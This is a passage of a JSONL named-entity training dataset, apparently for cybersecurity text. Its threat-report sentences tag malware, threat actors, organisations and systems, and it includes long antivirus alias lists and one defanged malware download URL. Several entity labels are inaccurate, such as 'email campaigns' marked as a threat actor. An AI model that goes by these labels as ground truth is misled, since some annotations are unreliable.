South-eastern Asia and around the South China Sea.", "spans": {"THREAT_ACTOR: Naikon APT": [[28, 38]], "THREAT_ACTOR: attack campaigns": [[54, 70]]}, "info": {"id": "cyner2_train_006843", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zusy.D14EB5 Win32/Oflwr.A!crypt Win.Downloader.Boltolog-223 Win32.Application.PUPStudio.A Worm.Win32.Dropper.RA Trojan:W32/DelfInject.R BackDoor.BlackHole.20244 TR/Graftor.123479.4 Trojan:Win32/Semsubim.A Trojan.Wecod Win32/Trojan.Clicker.4d5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006846", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.CED3 Trojan.Zenshirsh.SL7 Trojan.Zusy.D13E0F Win32.Trojan.Kryptik.av Trojan.Win32.Emager.ngb Trojan.Win32.FKM.dsobxk Trojan.Win32.Z.Zusy.159744.AME Backdoor.W32.Hupigon.le6i TrojWare.Win32.BHO.NJYY Trojan.Packed.26400 BehavesLike.Win32.Backdoor.cc Trojan.Win32.Spy Trojan.Emager.ly W32.Infostealer.Zeus Win32.Troj.Undef.kcloud Trojan.Win32.Emager.ngb Trojan/Win32.Small.C10819 TScope.Malware-Cryptor.SB Trojan.Win32.Dropper.abe Trojan.Emager!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006847", "source": "cyner2_train"}} {"text": "Unit 42 researchers at Palo Alto Networks have discovered new attack activity targeting individuals involved with United States defense contractors.", "spans": {"ORGANIZATION: Unit 42 researchers": [[0, 19]], "ORGANIZATION: Palo Alto Networks": [[23, 41]], "ORGANIZATION: United States defense contractors.": [[114, 148]]}, "info": {"id": "cyner2_train_006850", "source": "cyner2_train"}} {"text": "However, it should be noted that this was not an isolated incident: this is the latest in a series of similar attacks in Ukraine.", "spans": {}, "info": {"id": "cyner2_train_006851", "source": "cyner2_train"}} {"text": "At the time, it was being distributed via both targeted email campaigns and exploit kits EKs.", "spans": {"THREAT_ACTOR: email campaigns": [[56, 71]], 
"MALWARE: exploit kits EKs.": [[76, 93]]}, "info": {"id": "cyner2_train_006852", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDropper.RAR W32/Trojan.WAHH-7616 Trojan.Win32.RAR.crvcdy Trojan.Win32.Z.Dropper.1318323 Trojan:MSIL/Ainslot.A Win32/PSW.Tibia.NGP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006855", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.BypassUAC Exploit.Win32.BypassUAC.ihb Trojan.Win32.Tordev.exuhxz Exploit.W32.Bypassuac!c BackDoor.Tordev.976 Exploit.BypassUAC.Win32.1119 BehavesLike.Win32.Dropper.bc Trojan.Win32.Ekstak Exploit.BypassUAC.amp TR/Injector.otvkc Trojan[Exploit]/Win32.BypassUAC Trojan.Graftor.D71C73 Exploit.Win32.BypassUAC.ihb Backdoor:Win32/Rescoms.B Trojan/Win32.BypassUAC.C2399731 Exploit.BypassUAC Trj/CI.A Win32.Trojan.Inject.Auto Win32/Trojan.852", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006856", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.VB.z4 Trojan.VB.Win32.155172 Trojan/Dropper.StartPage.dzs Win32.Trojan.WisdomEyes.16070401.9500.9663 Trojan.Win32.VBKrypt TrojanDownloader:Win32/Swity.C Trojan.VB!g1fz4qjxDzc W32/VB.NTK!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006858", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.SmokeLdr.A3 Trojan.Ransom.GlobeImposter Trojan.Injector TROJ_INJECT.AUSPTF Win32.Trojan.Injector.MH Trojan.Win32.Khalesi.bjm Trojan.Win32.Khalesi.exdymq Trojan.Win32.Z.Razy.286720.EN Trojan.Encoder.11539 TROJ_INJECT.AUSPTF BehavesLike.Win32.PWSZbot.dm Trojan-Ransom.GlobeImposter W32/Trojan.BXWF-8222 Trojan.Khalesi.jz TR/Kryptik.nopxu Trojan/Win32.Khalesi Trojan.Razy.D3C133 Trojan.Win32.Khalesi.bjm Trojan/Win32.VBKrypt.C2374802 Trojan.Khalesi Trj/GdSda.A Win32.Trojan.Khalesi.Swkj Win32/Trojan.674", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006859", "source": "cyner2_train"}} {"text": "It is 
an old threat and was well-described by Symantec back in 2009.", "spans": {"MALWARE: old threat": [[9, 19]], "ORGANIZATION: Symantec": [[46, 54]]}, "info": {"id": "cyner2_train_006861", "source": "cyner2_train"}} {"text": "A number of downloaders installing further malware from http://mondaynightfundarts[.]com/images/Nu48djdi.zip", "spans": {"MALWARE: downloaders": [[12, 23]], "MALWARE: malware": [[43, 50]]}, "info": {"id": "cyner2_train_006864", "source": "cyner2_train"}} {"text": "It's a trojan spy which is installed as service called RCSU.", "spans": {"MALWARE: trojan spy": [[7, 17]]}, "info": {"id": "cyner2_train_006865", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clodeac.Trojan.9edf Trojan.PlugX.A4 BKDR_PLUGX.DUKH Win32.Trojan.WisdomEyes.16070401.9500.9975 BKDR_PLUGX.DUKH Trojan-Spy.Win32.Lurk.vtx Trojan.Win32.Datufly.ebtzfj Trojan.Win32.Z.Injector.9728.AR[h] Uds.Dangerousobject.Multi!c Trojan.Injector.Win32.378784 worm.win32.gamarue.z TrojanSpy.Lurk.ep TR/Datufly.hmoo W32/Injector.CXAC!tr Trojan.Graftor.D429AC Trojan:Win32/Datufly.B!dha Trojan/Win32.Datufly.R184100 TrojanSpy.Lurk Win32.Trojan-spy.Lurk.Amck TrojanSpy.Lurk!fV54mUiVDuY Trojan.Win32.Injector Inject3.AMFK Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006866", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Irc.Mimic.C Trojan.Glitch.A BKDR_IRCMIMIC.C IRC/Mimic.C Hacktool.Flooder BKDR_IRCMIMIC.C Win.Trojan.Soldier-7 Backdoor.IRC.Mimic.c Backdoor.Irc.Mimic.C DoS.W32.LifeWare!c Backdoor.Irc.Mimic.C DDoS.LifeWire BehavesLike.Win32.PWSZbot.bc Trojan.Win32.DoS IRC/Mimic.C IRC/Mimic.8 HackTool[DoS]/Win32.LifeWare DDoS:Win32/LifeWire.A Backdoor.IRC.Mimic.c DoS.LifeWare Trojan.HideWindows Bck/Iroffer.BG Irc.Backdoor.Mimic.Htmt VBS.Flood.L W32/LifeWare.A!dos Win32/Virus.IRC.f2c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006867", "source": "cyner2_train"}} {"text": "Using the Dynamic Threat 
Intelligence Cloud DTI, FireEye researchers detected a pattern of attacks beginning on April 13th, 2015.", "spans": {"SYSTEM: Dynamic Threat Intelligence Cloud DTI,": [[10, 48]], "ORGANIZATION: FireEye": [[49, 56]]}, "info": {"id": "cyner2_train_006868", "source": "cyner2_train"}} {"text": "Just recently, we found a new spam campaign of Hancitor with some notable developments that may have been in the previous variants, but were not discussed in any other reports.", "spans": {"THREAT_ACTOR: new spam campaign": [[26, 43]], "MALWARE: Hancitor": [[47, 55]], "MALWARE: variants,": [[122, 131]]}, "info": {"id": "cyner2_train_006869", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Fadedoor.287744 Email-Worm.Win32.GOPworm.196 Trojan.Heur.rGWarTuQ32piy Win32.Trojan.WisdomEyes.16070401.9500.9787 W32/Backdoor.MAW Backdoor.Trojan Backdoor.Win32.Fadedoor.a Trojan.Win32.Fadedoor.frpv Backdoor.Win32.Fadedoor.287744 Backdoor.W32.Fadedoor.a!c Backdoor.Win32.Fadedoor.10 BackDoor.Fade.10 Backdoor.Fadedoor.Win32.22 W32/Backdoor.THLZ-3240 Backdoor/Fadedoor.i BDS/Fade.10.Srv1 Trojan[Backdoor]/Win32.Fadedoor Win32.Hack.Fadedoor.a.kcloud Backdoor:Win32/Fakedoor.B Backdoor.Win32.Fadedoor.a Worm/Win32.IRCBot.R67641 Email-Worm.Win32.GOPworm.196 TScope.Trojan.Delf Bck/Fadedoor.A Win32.Backdoor.Fadedoor.Efue Backdoor.Fadedoor!nYSsZcqQ6hQ W32/Fadedoor.A!tr Win32/Trojan.fd1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006870", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Downloader.VB.lvv W32/Downldr2.FUOC DLoader.APBLQ TROJ_SPNR.07L611 Win32.HEURCrypted Trojan.Downloader-71476 Trojan-Downloader.Win32.VB.lwz Trojan.DL.VB!n7YxP+4/z6k Trojan.Win32.Downloader.94208.EO Virus.Win32.Heur.k TrojWare.Win32.Trojan.VB.~BVZ Trojan.DownLoad1.50365 TROJ_SPNR.0CA512 TrojanDownloader.VB.rbu Win32.TrojDownloader.VB.kcloud W32/Downloader.RCLB-8389 Win-Trojan/Xema.variant TrojanDownloader.VB Trojan-Downloader.Win32.VB 
W32/VB.LVV!tr.dldr Trj/Downloader.VVG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006872", "source": "cyner2_train"}} {"text": "AsyncRAT is a popular malware commodity and tools used by attackers to gain access to targeted hosts or networks, including those using Microsoft's OneNote email address.", "spans": {"MALWARE: AsyncRAT": [[0, 8]], "MALWARE: malware": [[22, 29]], "MALWARE: tools": [[44, 49]], "THREAT_ACTOR: attackers": [[58, 67]], "SYSTEM: networks,": [[104, 113]], "SYSTEM: Microsoft's OneNote": [[136, 155]]}, "info": {"id": "cyner2_train_006873", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Razy.D1D44E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006874", "source": "cyner2_train"}} {"text": "JPCERT / CC confirms that a targeted mail with a ZIP file containing an executable file has been sent to domestic organizations around October 2016.", "spans": {"ORGANIZATION: JPCERT": [[0, 6]], "ORGANIZATION: CC": [[9, 11]], "ORGANIZATION: domestic organizations": [[105, 127]]}, "info": {"id": "cyner2_train_006875", "source": "cyner2_train"}} {"text": "Recently, we have discovered 132 Android apps on Google Play infected with tiny hidden IFrames that link to malicious domains in their local HTML pages, with the most popular one having more than 10,000 installs alone.", "spans": {"SYSTEM: Android apps on Google Play": [[33, 60]]}, "info": {"id": "cyner2_train_006877", "source": "cyner2_train"}} {"text": "The threat actors target a wide range of organizations: CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects, but also targeting other industry verticals and attacking organizations involved in international relations.", "spans": {"THREAT_ACTOR: The threat actors": [[0, 17]], "ORGANIZATION: CTU researchers": [[56, 71]], "THREAT_ACTOR: TG-3390": [[86, 93]], "ORGANIZATION: defense": [[132, 139]], "ORGANIZATION: industry": [[189, 197]], 
"ORGANIZATION: organizations": [[222, 235]], "ORGANIZATION: international relations.": [[248, 272]]}, "info": {"id": "cyner2_train_006878", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9607 Trojan.Win32.DownLoad4.exjknn Trojan.DownLoad4.114 Trojan/Win32.Cerber.R219560 Trojan.BitCoinMiner Trojan.Zusy.D42D87 Trj/CI.A Win32/Trojan.5a2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006880", "source": "cyner2_train"}} {"text": "The attackers used compromised websites or watering holes to infect pre-selected targets with previously unknown malware.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "MALWARE: unknown malware.": [[105, 121]]}, "info": {"id": "cyner2_train_006881", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Downloader.Kather.e Win32.Trojan.WisdomEyes.16070401.9500.9855 W32/Downldr2.ANMO Backdoor.Trojan WORM_POSAM.A Win.Trojan.Kather-1 Trojan-Downloader.Win32.Kather.e Trojan.Win32.Kather.dips Win32.Trojan-downloader.Kather.Tdfl TrojWare.Win32.TrojanDownloader.Kather.E Trojan.Kather.43661 Downloader.Kather.Win32.6 WORM_POSAM.A W32/Downloader.KXIZ-5728 Trojan/Kather.i TR/Dldr.Kather.E Trojan[Downloader]/Win32.Kather Win32.TrojDownloader.Kather.e.kcloud Troj.Downloader.W32.Kather.e!c Trojan-Downloader.Win32.Kather.e TrojanDownloader:Win32/Kather.E Win32/TrojanDownloader.Kather.E Trojan.DL.Kather!WhdeU9hib+w W32/Kather.A!tr.dldr Win32/Trojan.b64", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006884", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.VBTipocadLTJ.Trojan Trojan/W32.Reconyc.95744 Trojan.Reconyc Trojan.Win32.Reconyc.ghqx Trojan.Win64.Reconyc.ewbtpt Troj.W32.Reconyc.tnqK BehavesLike.Win64.Downloader.nh Trojan.Win32.Reconyc TR/Dropper.onknt TrojanDownloader:Win32/Reconyc.B!bit Trojan.Win32.Reconyc.ghqx Trojan/Win64.Reconyc.C1746256 Trojan.Reconyc Trojan.Reconyc Trj/CI.A VBS/Kryptik.D 
Win32.Trojan.Reconyc.Hwdh Trojan.Reconyc! Win32/Trojan.658", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006885", "source": "cyner2_train"}} {"text": "We discovered this China-based third-party iOS app store aggressively promoting their repackaged apps in social network channels—YouTube, Facebook, Google+, and Twitter—banking on the popularity of games and apps such as Minecraft, Terraria, and Instagram to lure users into downloading them.", "spans": {"SYSTEM: China-based third-party iOS app store": [[19, 56]], "SYSTEM: channels—YouTube, Facebook, Google+,": [[120, 156]], "SYSTEM: Twitter—banking": [[161, 176]], "SYSTEM: games": [[198, 203]], "SYSTEM: apps": [[208, 212]], "SYSTEM: Minecraft, Terraria,": [[221, 241]], "SYSTEM: Instagram": [[246, 255]]}, "info": {"id": "cyner2_train_006886", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Sirefef.A Trojan.CoinMiner.Win32.474 Trojan.Kazy.D54A3A Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Limitail Trojan.Win32.Yakes.cvappu Troj.W32.Yakes.egne!c Trojan.BtcMine.148 BehavesLike.Win32.Downloader.fh Trojan.Win32.CoinMiner W32/Trojan.XYUN-7891 Trojan/Yakes.mzh TR/Rogue.1594174 Trojan/Win32.Yakes Trojan:Win32/Kraziomel.D Trojan/Win32.Yakes.C284072 Trojan.TDSS.01414 Win32/CoinMiner.CF Trojan.Yakes!WgDSy6aOE8s W32/Kryptik.EXA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006887", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.NSIS.Androm.8 Troj.Nsis.Androm!c Win32.Trojan.WisdomEyes.16070401.9500.9791 Ransom.Rokku Ransom_.97182692 Zum.Ransom.NSIS.Cerber.1 Trojan-Ransom.Win32.Zcryptor.g Trojan.NSIS.Androm.8 Trojan.Win32.Inject.evkooj Trojan.Win32.Z.Injector.697990 Ransom_.97182692 BehavesLike.Win32.Ransom.jc Trojan.Win32.Injector Ransom:Win32/ZCryptor.A Trojan-Ransom.Win32.Zcryptor.g Trojan-Ransom.Zcryptor Trj/CI.A Zum.Ransom.NSIS.Cerber.1 Win32.Trojan.Zcryptor.Lndy Win32/Trojan.Ransom.a9f", "spans": {"MALWARE: 
backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006889", "source": "cyner2_train"}} {"text": "Slowly putting the pieces together, the global picture began to take shape, exposing a massive adware campaign affecting approximately half a million users.", "spans": {"THREAT_ACTOR: massive adware campaign": [[87, 110]], "ORGANIZATION: half a million users.": [[135, 156]]}, "info": {"id": "cyner2_train_006890", "source": "cyner2_train"}} {"text": "A backdoor also known as: Android.Trojan.Banker.DF Android.Trojan.Banker.DF Other:Android.Reputation.2 Infostealer.Bancos Android.Trojan.Banker.DF HEUR:Trojan-Banker.AndroidOS.Svpeng.q A.H.Pri.SvPeng.E Trojan.Android.Banker.egowei Trojan:Android/InfoStealer.CM Android.Banker.70.origin ZIP/Trojan.IGVK-5 Android.Trojan.Banker.DF Android-Trojan/Svpeng.3becd HEUR:Trojan-Banker.AndroidOS.Svpeng.q Trojan.AndroidOS.Banker.A a.expense.fakeinstall.b Trojan-Banker.AndroidOS.Svpeng", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006891", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.MSIL Trojan.SpamThru Trojan.DownLoader25.28452 BehavesLike.Win32.Trojan.wm TR/Dropper.MSIL.qtean Backdoor:VBS/Sisbot.A Trojan.MSIL.Androm.9 Trojan/Win32.Sisbot.R216242 Trj/GdSda.A MSIL/Dropper.XXX!tr Win32/Trojan.b5b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006892", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.A728 Trojan.PWS.OnlineGames.AADX Trojan-GameThief.Win32.OnLineGames!O Trojan.PWS.OnlineGames.AADX Trojan/OnLineGames.snrt Win32.Trojan.WisdomEyes.16070401.9500.9990 Infostealer.Gampass TROJ_SYSTEMHI.IM Win.Spyware.50098-2 Trojan-GameThief.Win32.OnLineGames.snrt Trojan.PWS.OnlineGames.AADX Trojan.Win32.Drop.bbdxzx Trojan.PWS.OnlineGames.AADX Trojan.PWS.OnlineGames.AADX Trojan.MulDrop.21159 TROJ_SYSTEMHI.IM Backdoor/Bifrose.jhl Trojan[GameThief]/Win32.OnLineGames Trojan.PWS.OnlineGames.AADX Trojan.Win32.PSWIGames.21508 
Trojan-GameThief.Win32.OnLineGames.snrt Trojan.PWS.OnlineGames.AADX Trojan/Win32.OnlineGameHack.R10533 Win32.Trojan-GameThief.Onlinegames.cruv Trojan-PWS.LDPinch", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006894", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Androm.A5 Win32.Trojan.WisdomEyes.16070401.9500.9994 Virus.W32.Rootkit!c Trojan.Inject2.30717 Trojan.Kryptik.Win32.1154178 Trojan.Win32.Crypt Trojan.Scarsi.ait Trojan/Win32.Scarsi Trojan.Win32.Z.Kryptik.563972 W32/Dorkbot.B!tr Win32/RootKit.Rootkit.7e5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006895", "source": "cyner2_train"}} {"text": "Microsoft refers to this family of malware as Sarvdap, however it must be noted that the detection appears somewhat generic.", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "MALWARE: malware": [[35, 42]], "MALWARE: Sarvdap,": [[46, 54]]}, "info": {"id": "cyner2_train_006896", "source": "cyner2_train"}} {"text": "FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015.", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "THREAT_ACTOR: threat group": [[32, 44]]}, "info": {"id": "cyner2_train_006897", "source": "cyner2_train"}} {"text": "The set of permissions required by Marcher according to the manifest is as follows : ∗ android.permission.CHANGE_NETWORK_STATE ( change network connectivity state ) ∗ android.permission.SEND_SMS ( send SMS messages ) ∗ android.permission.USES_POLICY_FORCE_LOCK ( lock the device ) ∗ android.permission.RECEIVE_BOOT_COMPLETED ( start malware when device boots ) ∗ android.permission.INTERNET ( communicate with the internet ) ∗ android.permission.VIBRATE ( control the vibrator ) ∗ android.permission.ACCESS_WIFI_STATE ( view information about the status of Wi-Fi ) ∗ android.permission.WRITE_SMS ( edit/delete SMS ) ∗ android.permission.ACCESS_NETWORK_STATE ( view the status of all networks ) ∗ 
android.permission.WAKE_LOCK ( prevent the phone from going to sleep ) ∗ android.permission.GET_TASKS ( retrieve running applications ) ∗ android.permission.CALL_PHONE ( call phone numbers ) ∗ android.permission.WRITE_SETTINGS ( read/write global system settings ) ∗ android.permission.RECEIVE_SMS ( intercept SMS messages ) ∗ android.permission.READ_PHONE_STATE ( read phone details of the device such as phone number and serial number ) ∗ android.permission.CHANGE_WIFI_STATE ( connect to and disconnect from Wi-Fi networks and make changes to configured networks ) ∗ android.permission.READ_CONTACTS ( read all contact data ) * android.permission.READ_SMS ( read SMS messages ) Obviously a fairly significant list of permissions of which many are suspicious , especially when combined .", "spans": {"MALWARE: Marcher": [[35, 42]]}, "info": {"id": "cyner2_train_006900", "source": "cyner2_train"}} {"text": "In December 2015, Chinese users reported they were infected by this malware.", "spans": {"ORGANIZATION: Chinese users": [[18, 31]], "MALWARE: malware.": [[68, 76]]}, "info": {"id": "cyner2_train_006901", "source": "cyner2_train"}} {"text": "We took a look at the malware specifically in the INOCNATION campaign to analyze what was new and different about the techniques used by the threat actor.", "spans": {"MALWARE: malware": [[22, 29]], "THREAT_ACTOR: INOCNATION campaign": [[50, 69]], "THREAT_ACTOR: threat actor.": [[141, 154]]}, "info": {"id": "cyner2_train_006902", "source": "cyner2_train"}} {"text": "New nodes are continually added as new victims are enlisted, and they are unpublished outside of the Terracotta user-base.", "spans": {"MALWARE: Terracotta": [[101, 111]], "SYSTEM: user-base.": [[112, 122]]}, "info": {"id": "cyner2_train_006903", "source": "cyner2_train"}} {"text": "With the prevalence of Google Android smartphones and the popularity of feature-rich apps, more and more people rely on smartphones to store and handle kinds of personal and business information 
which attracts adversaries who want to steal that information.", "spans": {"ORGANIZATION: Google": [[23, 29]], "SYSTEM: Android smartphones": [[30, 49]], "SYSTEM: smartphones": [[120, 131]], "THREAT_ACTOR: adversaries": [[210, 221]]}, "info": {"id": "cyner2_train_006904", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanPWS.Zbot.VA3 Trojan.Tofsee Trojan/Injector.ccfi TROJ_HPVB.SM6 Win32.Trojan.WisdomEyes.16070401.9500.9999 Ransom.Kovter TROJ_HPVB.SM6 Trojan.Win32.Inject.wlzt Trojan.Win32.Inject.dwzyvq Troj.W32.Inject.tnFQ Trojan.Kovter.69 Trojan.Inject.Win32.168460 Trojan.Win32.Injector Trojan/Inject.baac Trojan/Win32.Inject Trojan.Symmi.DCC5C Trojan.Win32.Inject.wlzt Trojan/Win32.Kovter.R153629 Trojan.Inject Trojan.Inject!3ypDMCpDv7Y W32/Injector.CEEO!tr Win32/Trojan.Dropper.43b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006907", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Mytob Win32.Trojan.WisdomEyes.16070401.9500.9860 W32/Trojan.DMPW-1529 Net-Worm.Win32.Mytob.lsk Trojan.Win32.Win32.dchvpv Trojan.Win32.Z.Mytob.27648 Net.Worm.W32.Mytob!c Trojan.Win32.Clicker!BT Worm/Mytob.als TR/Clicker.ofeiu Worm[Net]/Win32.Mytob Net-Worm.Win32.Mytob.lsk TrojanClicker:MSIL/Doviali.A Worm/Win32.Mytob.C84872 Trojan.Win32.Clicker!BT Net-Worm.Mytob Trojan.MSIL.TrojanClicker W32/MyTob.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006908", "source": "cyner2_train"}} {"text": "Trend Micro detects this as ANDROIDOS_SOCKSBOT.A and has found at least 3,000 Trojanized apps.", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "MALWARE: 3,000 Trojanized apps.": [[72, 94]]}, "info": {"id": "cyner2_train_006912", "source": "cyner2_train"}} {"text": "This post analyzes targeted malware attacks against groups in the Tibetan diaspora and pro-democracy groups in Hong Kong.", "spans": {"MALWARE: malware attacks": [[28, 43]]}, "info": {"id": "cyner2_train_006914", "source": "cyner2_train"}} 
{"text": "In October 2015 the Callisto Group targeted a handful of individuals with phishing emails that attempted to obtain the target's webmail credentials.", "spans": {"THREAT_ACTOR: the Callisto Group": [[16, 34]], "ORGANIZATION: individuals": [[57, 68]]}, "info": {"id": "cyner2_train_006918", "source": "cyner2_train"}} {"text": "On January 27, 2016 Cyphort Labs discovered a site infected with Angler EK leading to a fileless Gootkit a.k.a. XswKit malware.", "spans": {"ORGANIZATION: Cyphort Labs": [[20, 32]], "MALWARE: Angler EK": [[65, 74]], "MALWARE: Gootkit": [[97, 104]], "MALWARE: XswKit malware.": [[112, 127]]}, "info": {"id": "cyner2_train_006919", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Foosace Trojan.Sofacy.C TSPY_SEDNIT.A Trojan.Win32.Z.Graftor.81408.L TSPY_SEDNIT.A W32/Trojan.GBLK-5942 Trojan:Win32/Foosace.K!dha Trojan/Win32.Sednit.R155481 Win32/Sednit.C Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006920", "source": "cyner2_train"}} {"text": "Two prominent lawyers representing the families of three slain Mexican women were sent infection attempts with NSO Group's Pegasus spyware", "spans": {"ORGANIZATION: lawyers": [[14, 21]], "ORGANIZATION: families": [[39, 47]], "ORGANIZATION: three slain Mexican women": [[51, 76]], "THREAT_ACTOR: NSO Group's": [[111, 122]], "MALWARE: Pegasus spyware": [[123, 138]]}, "info": {"id": "cyner2_train_006921", "source": "cyner2_train"}} {"text": "htpRAT, uncovered by RiskIQ cyber investigators, is the newest weapon in Chinese cyberattackers' campaign against Association of Southeast Asian Nations ASEAN.", "spans": {"MALWARE: htpRAT,": [[0, 7]], "ORGANIZATION: RiskIQ cyber investigators,": [[21, 48]], "MALWARE: weapon": [[63, 69]], "THREAT_ACTOR: Chinese cyberattackers' campaign": [[73, 105]], "ORGANIZATION: Association of Southeast Asian Nations ASEAN.": [[114, 159]]}, "info": {"id": "cyner2_train_006922", "source": "cyner2_train"}} {"text": "A 
backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 PWS:MSIL/Logbro.A Trojan/Win32.Skeeyah.R207512 MSIL.Backdoor.SRat.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006923", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur.DP.ED408E Ransom_Delcryset.R055C0DAF18 Trojan-Ransom.Win32.Matrix.qt Trojan.Win32.Matrix.ewhoom Trojan.DownLoader26.4261 Ransom_Delcryset.R055C0DAF18 BehavesLike.Win32.BadFile.dh W32/Trojan.YJSB-6810 TR/AD.RansomHeur.ulxhr Ransom:Win32/Delcryset.A Trojan-Ransom.Win32.Matrix.qt Trj/GdSda.A W32/Filecoder_LockedFile.D!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006924", "source": "cyner2_train"}} {"text": "These tools include: HKTL_MIMIKATZ, HKTL_FGDUMP, and HKTL_VNCPASSVIEW.", "spans": {"MALWARE: tools": [[6, 11]]}, "info": {"id": "cyner2_train_006928", "source": "cyner2_train"}} {"text": "FIN7 is a financially-motivated threat actor targeting large organizations that process payment card data or have a significant point of sale environment.", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "THREAT_ACTOR: threat actor": [[32, 44]], "ORGANIZATION: organizations": [[61, 74]], "SYSTEM: point of sale environment.": [[128, 154]]}, "info": {"id": "cyner2_train_006929", "source": "cyner2_train"}} {"text": "This dissimilarity only grew with the further enumeration of other targets, describing a broad targeting across the Middle East without wholly implicating any particular interest, despite clear political intent.", "spans": {}, "info": {"id": "cyner2_train_006930", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.B82E Trojan.Nsis.Dwn.ewrrol BehavesLike.Win32.Vopak.cc Trojan.Inject.acan TrojanDownloader:Win32/Tanske.A!bit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006932", "source": "cyner2_train"}} {"text": "The malware is responsible for encrypting files on a victim's machine and demanding a ransom via 
the Bitcoin cryptocurrency.", "spans": {"MALWARE: malware": [[4, 11]], "SYSTEM: victim's machine": [[53, 69]]}, "info": {"id": "cyner2_train_006933", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ekidoa.FC.2847 Trojan.MSILPerseus.D1EE89 Win32.Trojan.WisdomEyes.16070401.9500.9998 TrojWare.MSIL.Ekidoa.A BackDoor.Bladabindi.13678 Trojan.MSIL.Crypt TR/Dropper.MSIL.hoclc MSIL/Kryptik.FDF!tr Trojan:MSIL/Ekidoa.A!bit Trojan/Win32.Skeeyah.R194563 Backdoor.MSIL.SpyGate Backdoor.Bladabindi Backdoor.SpyGate!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006934", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/FlyStudio.atk Win.Trojan.7691310-1 Trojan-Dropper.Win32.Dinwod.vqz Trojan.Win32.FlyStudio.zlxrd Trojan.PWS.Wsgame.36294 BehavesLike.Win32.Ipamor.fc Trojan/FlyStudio.dpn Trojan/Win32.FlyStudio Trojan:Win32/Derunsex.A Troj.W32.FlyStudio.atk!c Trojan-Dropper.Win32.Dinwod.vqz Trj/CI.A Win32.Trojan.Flystudio.dbsu Trojan.Crypt W32/FlyStudio.ATK!tr Win32/Trojan.0e3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006935", "source": "cyner2_train"}} {"text": "On March 29, 2023, reports circulating about a potential supply chain compromise for 3CXDesktopApp — a softphone application from 3CX.", "spans": {"VULNERABILITY: compromise": [[70, 80]], "SYSTEM: 3CXDesktopApp": [[85, 98]], "SYSTEM: softphone application": [[103, 124]], "ORGANIZATION: 3CX.": [[130, 134]]}, "info": {"id": "cyner2_train_006936", 